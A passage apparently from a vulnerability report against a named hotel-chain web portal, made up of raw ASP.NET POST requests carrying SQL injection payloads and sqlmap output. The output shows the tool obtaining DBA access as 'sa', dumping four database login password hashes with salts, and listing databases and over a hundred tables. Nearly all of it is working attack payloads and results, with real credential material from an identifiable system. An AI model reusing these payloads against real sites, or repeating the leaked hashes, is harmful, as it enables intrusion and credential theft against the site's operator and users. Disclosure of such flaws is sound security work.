0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirb
mgIEgIOWAkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29
udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXI
xJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCR
Db250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCR
jdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5
jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2V
uZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5
Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiR
yYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2x
kZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFB
sYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8uNGC3+B
n5jU=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtW
atermarked=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuer
y$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$cbAllowPaging=on&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDesc
end&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl0
0$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl
00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$Co
ntentPlaceHolder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceH
older2$ucCreateTime$scLeft=2015-07-28&ctl00$ctl00$ContentPlaceHolder1$ContentPla
ceHolder2$ucCreateTime$scRight=2015-08-11&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$ucLastModifyTime$scLeft=2015-08-05&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-06&ctl00$ctl00$ContentPlac
eHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1
$ContentPlaceHolder2$txtLastModifyUserName=4%' AND 3899=CONVERT(INT,(SELECT CHAR
(113)+CHAR(121)+CHAR(108)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3899=3899) THE
N CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(105)+CHAR(110)+CHAR(113)
)) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scLe
ft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder$scRight=5&ct
l00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=&ctl00$ctl00$ContentP
laceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
---
[20:10:18] [WARNING] changes made by tampering scripts are not included in shown
 payload content(s)
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtFormName, type: Single quoted string (default)
[1] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtCreateUserName, type: Single quoted string
[2] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtDescription, type: Single quoted string
[3] place: POST, parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$
txtLastModifyUserName, type: Single quoted string
[q] Quit
> 0
[20:10:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
[20:10:43] [INFO] fetching current user
[20:10:43] [INFO] resumed: sa
current user:    'sa'
[20:10:43] [INFO] fetching current database
[20:10:43] [INFO] resumed: super8db
current database:    'super8db'
[20:10:43] [INFO] testing if current user is DBA
current user is DBA:    True
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] myportal
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x010005d418f8c0a940550f9d11a7135f56045fce2e0a1754c495
        header: 0x0100
        salt: 05d418f8
        mixedcase: c0a940550f9d11a7135f56045fce2e0a1754c495
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x0100b81612821c70d559c0381392a3e18659339515484385335f
        header: 0x0100
        salt: b8161282
        mixedcase: 1c70d559c0381392a3e18659339515484385335f
[*] myportal [1]:
    password hash: 0x01009b9f7553fbbca05677c781d8f3fd97fbe9b0326479c217ad
        header: 0x0100
        salt: 9b9f7553
        mixedcase: fbbca05677c781d8f3fd97fbe9b0326479c217ad
[*] sa [1]:
    password hash: 0x01002c6503ef9f84039673d6f5b1c6faa41f019ae40963430d2c
        header: 0x0100
        salt: 2c6503ef
        mixedcase: 9f84039673d6f5b1c6faa41f019ae40963430d2c
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8dbTest
[*] tempdb
Database: su8
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.ecs_admin_log            | 8503    |
| dbo.ecs_region               | 3430    |
| dbo.My_Quality               | 2701    |
| dbo.My_Sup_Order             | 1692    |
| dbo.My_Owners                | 1252    |
| dbo.ecs_users                | 1225    |
| dbo.Sheet2                   | 594     |
| dbo.Sheet2_bak20141230       | 517     |
| dbo.My_Integral_log          | 511     |
| dbo.Sheet2_bak20140820       | 426     |
| dbo.My_DepArticle            | 398     |
| dbo.My_ProductsInfo          | 385     |
| dbo.Sheet2_bak20130701       | 378     |
| dbo.Sheet                    | 347     |
| dbo.SheetBak20121231         | 347     |
| dbo.ecs_attribute            | 216     |
| dbo.My_ProductsInfo_Photos   | 213     |
| dbo.ecs_article              | 189     |
| dbo.ecs_article_bak          | 188     |
| dbo.ecs_order_action         | 179     |
| dbo.My_Complaints            | 179     |
| dbo.ecs_shop_config          | 170     |
| dbo.ecs_admin_action         | 153     |
| dbo.ecs_admin_comparison     | 111     |
| dbo.ecs_goods                | 92      |
| dbo.ecs_order_goods          | 78      |
| dbo.ecs_vote_option          | 76      |
| dbo.ecs_order_info           | 74      |
| dbo.My_SubFile               | 74      |
| dbo.View_users_order         | 70      |
| dbo.View_order_goods_list    | 61      |
| dbo.ecs_article_cat          | 59      |
| dbo.View_order_integral      | 58      |
| dbo.ecs_goods_attr           | 53      |
| dbo.My_Article_TitImg        | 46      |
| dbo.ecs_ad                   | 42      |
| dbo.ecs_goods_gallery        | 42      |
| dbo.ecs_account_log          | 41      |
| dbo.My_Suppliers             | 39      |
| dbo.xy_region                | 39      |
| dbo.ecs_member_price         | 38      |
| dbo.ecs_feedback             | 37      |
| dbo.View_user_message        | 37      |
| dbo.ecs_volume_price         | 33      |
| dbo.ecs_ad_position          | 31      |
| dbo.ecs_vote_log             | 30      |
| dbo.My_DepUser               | 23      |
| dbo.ecs_admin_user           | 22      |
| dbo.ecs_exchange_goods       | 19      |
| dbo.My_Products              | 19      |
| dbo.ecs_area_region          | 17      |
| dbo.ecs_category             | 17      |
| dbo.ecs_mail_templates       | 17      |
| dbo.View_shipping            | 17      |
| dbo.ecs_admin_message        | 16      |
| dbo.My_Weighted              | 15      |
| dbo.View_exchange_goods      | 15      |
| dbo.ecs_delivery_goods       | 14      |
| dbo.ecs_shipping             | 14      |
| dbo.My_Departments           | 14      |
| dbo.My_Supply_for            | 14      |
| dbo.ecs_brand                | 13      |
| dbo.ecs_goods_cat            | 13      |
| dbo.My_WScore                | 13      |
| dbo.View_WScore_Print        | 13      |
| dbo.ecs_delivery_order       | 12      |
| dbo.ecs_vote                 | 12      |
| dbo.ecs_goods_type           | 11      |
| dbo.ecs_shipping_area        | 11      |
| dbo.ecs_shipping_area_expand | 11      |
| dbo.ecs_user_address         | 10      |
| dbo.Global_Settings          | 10      |
| dbo.ecs_pay_log              | 8       |
| dbo.My_QAph                  | 8       |
| dbo.ecs_comment              | 7       |
| dbo.ecs_goods_activity       | 7       |
| dbo.View_comment             | 7       |
| dbo.ecs_tag                  | 6       |
| dbo.ecs_user_bonus           | 6       |
| dbo.My_DepArticleCat         | 6       |
| dbo.View_tag_manage          | 6       |
| dbo.ecs_ad_index             | 5       |
| dbo.ecs_kill_goods           | 5       |
| dbo.ecs_role                 | 5       |
| dbo.ecs_snatch_log           | 5       |
| dbo.View_user_snatch_log     | 5       |
| dbo.ecs_bonus_type           | 4       |
| dbo.ecs_payment              | 4       |
| dbo.ecs_user_account         | 4       |
| dbo.My_Annual_Rules          | 4       |
| dbo.My_Hotel_type            | 4       |
| dbo.Shop_Email               | 4       |
| dbo.ecs_cat_recommend        | 3       |
| dbo.ecs_goods_activity_0     | 3       |
| dbo.ecs_products             | 3       |
| dbo.ecs_suppliers            | 3       |
| dbo.My_Sup_Evaluation        | 3       |
| dbo.View_My_Comments         | 3       |
| dbo.ecs_booking_goods        | 2       |
| dbo.ecs_cart                 | 2       |
| dbo.ecs_goods_activity_1     | 2       |
| dbo.ecs_goods_article        | 2       |
| dbo.ecs_pack                 | 2       |
| dbo.ecs_package_goods        | 2       |
| dbo.ecs_user_rank            | 2       |
| dbo.My_Grading_Results       | 2       |
| dbo.View_booking_goods       | 2       |
| dbo.ecs_favourable_activity  | 1       |
| dbo.ecs_friend_link          | 1       |
| dbo.ecs_goods_activity_2     | 1       |
| dbo.ecs_group_goods          | 1       |
| dbo.ecs_kill_user            | 1       |
| dbo.ecs_link_goods           | 1       |
| dbo.My_Annual_Rate           | 1       |
| dbo.My_Buy_for               | 1       |
| dbo.My_Rating_header         | 1       |
| dbo.My_Score_results         | 1       |
+------------------------------+---------+

自定义表单管理（搜索）

http://mys8.super8.com.cn:81/pages/bn/form/bn_formmanage.aspx (POST)
__EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnQuery&__EVENTARGUMENT=&__VIEWSTATE=/w
EPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQspZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5
FbnRpdHksIFZlcnNpb249MS4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAh4OT3JkZXJDb25kaXR
pb24FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgIGD2QWAgIDD2QWCAIBD2QWDAIDDw8WA
h4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8PFgIfAmhkZAILDw8WAh8CaGRkAhUPDxYCHg1XYXRlcm1h
cmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaHku7ZkFgJmD2QWAgIDDxYCHwMFFeivt%2Bi%2Bk
%2BWFpeafpeivouadoeS7tmQCAw88KwARAwAPFgoeC18hRGF0YUJvdW5kZx4Icm93Q291bnQCAR4RSXNFbXB0eURhdGFTb3Vy
Y2VnHgtfIUl0ZW1Db3VudGYeL0Vzb2Z0X19TbWFydEdyaWRWaWV3X19TbWFydFJhZGlvQnV0dG9uR3JvdXBOYW1lBRZTbWFydFJ
hZGlvQnV0dG9uQ29sdW1uZAEQFgAWABYADBQrAAAWAmYPZBYIAgEPZBYSZg8PFgIeBFRleHRlZGQCAQ8PFgIfCWVkZAICDw8
WAh8JZWRkAgMPDxYCHwllZGQCBA8PFgIfCWVkZAIFDw8WAh8JZWRkAgYPDxYCHwllZGQCBw8PFgIfCWVkZAIIDw8WAh8JZW
RkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHwpoZGQCBA9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgICAg9kFghmDw8WAh8
CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGRkAgcPZBYCAgMPZBYCZg9kFgICAw9kFggCBQ9kFgRmDw8WB
B4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1RhcmdldElEBQdzY1JpZ2h0HwkFCjIwMTUtMDctMjhkZAICDw8WBB8LBQZzY0xlZnQfCQ
UKMjAxNS0wOC0xMWRkAgcPZBYEZg8PFgQfCwUHc2NSaWdodB8JBQoyMDE1LTA4LTA1ZGQCAg8PFgQfCwUGc2NMZWZ0Hw
kFCjIwMTUtMDgtMDZkZAIND2QWBGYPDxYCHwkFATFkZAICDw8WAh8JBQE1ZGQCDw8QDxYGHg1EYXRhVGV4dEZpZWxkBQ
VWYWx1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt
%2BmAieaLqS0tCeW3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr%2Be8lui
%2BkQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ
5bey5Yig6ZmkCeW3suWBnOeUqAnlt7LlkK/nlKgJ5Y%2Bv57yW6L6RCeW3sueUn
%2BaViAnlvoXlrqHmoLgJ5bey5a6h5qC4CeW3suaLkue7nQnmnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ
2dnZ2dkZAIND2QWAgIDD2QWAmYPZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj
%2Bi/sAzliJvlu7rml7bpl7QS5pyA5ZCO5L%2Bu5pS55pe26Ze0EuWIm%2BW7uueUqOaIt
%2BWQjeensBjmnIDlkI7kv67mlLnnlKjmiLflkI3np7AVBghGb3JtTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnl
UaW1lDkNyZWF0ZVVzZXJOYW1lEkxhc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirbmgIEgIOW
AkuW6jwUFU3RhdGVnEAUR5o6S5bqP5Y
%2B3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYIBUFjdGwwMCRjdGwwMCRDb2
50ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWN
lSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb
2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvb
nRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZU
hvbGRlcjIkcmJ0bkFzY2VuZAU
%2BY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJG
N0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29u
dGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQb
GFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFk1AaHLga3ih3M2ubiWQKM0xV416HWT3j8u
NGC3%2BBn5jU%3D&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&ctl00
$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Ord
er=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHold
er1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuer
y=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtFormName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlace
Holder2$txtDescription=2&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scLeft=2015-07-
28&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucCreateTime$scRight=2015-08-
11&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scLeft=2015-08-
05&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucLastModifyTime$scRight=2015-08-
06&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtCreateUserName=3&ctl00$ctl00$ContentPlaceHolder1$Content
PlaceHolder2$txtLastModifyUserName=4&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scLeft=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ucTheOrder
$scRight=5&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=

ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtWatermarked存在注入
<code>sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery
$txtWatermarked
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$b
tnQuery&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMjA3ODgzNDEyMw8WBB4KUXVlcnlTdGF0ZQs
pZVN1cGVyOC5FbnRpdHkuQ29tbW9uLlF1ZXJ5U3RhdGUsIFN1cGVyOC5FbnRpdHksIFZlcnNpb249MS4
wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1udWxsAR4OT3JkZXJDb25kaXRpb24
FGFN0YXRlIERFU0MsVGhlT3JkZXIgREVTQxYCZg9kFgJmD2QWAgIDD2QWAgIGD2QWAgIDD2QWCAIBD2Q
WDAIDDw8WAh4HRW5hYmxlZGhkZAIFDw8WAh8CaGRkAgcPDxYCHwJoZGQCCQ8PFgIfAmhkZAILDw8WAh8
CaGRkAhUPDxYCHg1XYXRlcm1hcmtUZXh0BRXor7fovpPlhaXmn6Xor6LmnaHku7ZkFgJmD2QWAgIDDxY
CHwMFFeivt+i+k+WFpeafpeivouadoeS7tmQCAw88KwARAwAPFgweC18hRGF0YUJvdW5kZx4PQWxsU2V
sZWN0VmFsdWVzMswBAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJ
pYy5MaXN0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU
9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemU
IX3ZlcnNpb24GAAAICAkCAAAAAAAAAAAAAAARAgAAAAAAAAALHgtfIUl0ZW1Db3VudAIBHi9Fc29mdF9
fU21hcnRHcmlkVmlld19fU21hcnRSYWRpb0J1dHRvbkdyb3VwTmFtZQUWU21hcnRSYWRpb0J1dHRvbkN
vbHVtbh4RSXNFbXB0eURhdGFTb3VyY2VoHghyb3dDb3VudAIBZAEQFgAWABYADBQrAAAWAmYPZBYIAgE
PD2QWAh4Kb25kYmxjbGljawW6A2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2V
Ib2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKS5jaGVja2VkKXtyZXR
1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGF
jZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50Qnl
JZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2Qk5fRm9ybV9jdGwwMF8
wJykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29
udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0kY3RsMDIkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXI
xX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCTl9Gb3JtX2N0bDAwXzAnKTsWEmYPZBYCZg8QDxYCHh5Fc29
mdF9fU21hcnRSYWRpb0J1dHRvbl9fVmFsdWUFIDVDQjYzOEIxMDc5OTQyMTJBNjc4MjgxQ0ZBNDM1N0I
zFgIeBXN0eWxlBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHgRUZXh0BQExZAICD2QWAgIBDw8WBB8NBSL
pgJ845Lit5Zu95Lia5Li75ruh5oSP5bqm6LCD5p+l6KGoHg9Db21tYW5kQXJndW1lbnQFIDVDQjYzOEI
xMDc5OTQyMTJBNjc4MjgxQ0ZBNDM1N0IzZGQCAw9kFgJmDxUBEzIwMTMtMTAtMjkgMTQ6MjQ6MDZkAgQ
PZBYCZg8VAQVhZG1pbmQCBQ9kFgJmDxUBEzIwMTMtMTAtMjkgMTQ6MjQ6MDZkAgYPZBYCZg8VAQVhZG1
pbmQCBw9kFgJmDxUBAGQCCA9kFgICAQ8PFgYfDQUJ5Y+v57yW6L6RHglGb3JlQ29sb3IKjQEeBF8hU0I
CBGRkAgIPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHxFoZGQCBA9kFgJmD2QWAmYPZBYCZg9kFgICAQ9kFgI
CAg9kFghmDw8WAh8CaGRkAgEPDxYCHwJoZGQCAg8PFgIfAmhkZAIDDw8WAh8CaGRkAgcPZBYCAgMPZBY
CZg9kFgICAw9kFggCBQ9kFgRmDw8WBB4eRXNvZnRfX1NtYXJ0Q2FsZW5kYXJfX1RhcmdldElEBQdzY1J
pZ2h0Hw0FCjIwMTUtMDctMjhkZAICDw8WBB8SBQZzY0xlZnQfDQUKMjAxNS0wOC0xMWRkAgcPZBYEZg8
PFgQfEgUHc2NSaWdodB8NBQoyMDE1LTA4LTA1ZGQCAg8PFgQfEgUGc2NMZWZ0Hw0FCjIwMTUtMDgtMDZ
kZAIND2QWBGYPDxYCHw0FATFkZAICDw8WAh8NBQE1ZGQCDw8QDxYGHg1EYXRhVGV4dEZpZWxkBQVWYWx
1ZR4ORGF0YVZhbHVlRmllbGQFBVZhbHVlHwRnZBAVDA0tLeivt+mAieaLqS0tCeW3suWIoOmZpAnlt7L
lgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7L
mi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQVDAAJ5bey5Yig6ZmkCeW3suWBnOeUqAn
lt7LlkK/nlKgJ5Y+v57yW6L6RCeW3sueUn+aViAnlvoXlrqHmoLgJ5bey5a6h5qC4CeW3suaLkue7nQn
mnKrlrozmiJAJ5bey5a6M5oiQCeW3suaPkOS6pBQrAwxnZ2dnZ2dnZ2dnZ2dkZAIND2QWAgIDD2QWAmY
PZBYCAgMPZBYEAgEPEGQQFQYM6KGo5Y2V5ZCN56ewBuaPj+i/sAzliJvlu7rml7bpl7QS5pyA5ZCO5L+
u5pS55pe26Ze0EuWIm+W7uueUqOaIt+WQjeensBjmnIDlkI7kv67mlLnnlKjmiLflkI3np7AVBghGb3J
tTmFtZQtEZXNjcmlwdGlvbgpDcmVhdGVUaW1lDkxhc3RNb2RpZnlUaW1lDkNyZWF0ZVVzZXJOYW1lEkx
hc3RNb2RpZnlVc2VyTmFtZRQrAwZnZ2dnZ2dkZAILDxBkDxYCZgIBFgIQBQ7nirbmgIEgIOWAkuW6jwU
FU3RhdGVnEAUR5o6S5bqP5Y+3ICDlgJLluo8FCFRoZU9yZGVyZ2RkGAIFHl9fQ29udHJvbHNSZXF1aXJ
lUG9zdEJhY2tLZXlfXxYKBUFjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGF
jZUhvbGRlcjIkY2JBbGxvd1BhZ2luZwVJY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb25
0ZW50UGxhY2VIb2xkZXIyJGd2Qk5fRm9ybSRjdGwwMiRjdGwwMAVJY3RsMDAkY3RsMDAkQ29udGVudFB
sYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2Qk5fRm9ybSRjdGwwMiRjdGwwMAVFY3RsMDA
kY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF
1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ
0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGR
lcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGF
jZUhvbGRlcjIkcmJ0bkFzY2VuZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW5
0UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29
udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGV
yMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFPWN0bDAwJGN0bDAwJENvbnRlbnRQbGF
jZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJOX0Zvcm0PPCsADAEIAgFklWH+I+vFQIbXQHw
fSRoxmfe8PlbafmYMf6uKxxomWtg=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder
2$wtxtAdvancedQuery$txtWatermarked=1%' AND 9113=9113 AND '%'='&ctl00$ctl00$Conte
ntPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$TextBoxWatermarkExtender1_C
lientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on
&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$Con
tentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDescend&ctl00$ctl00$ContentPlaceH
older1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHolder1$C
ontentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$Conten
tPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolde
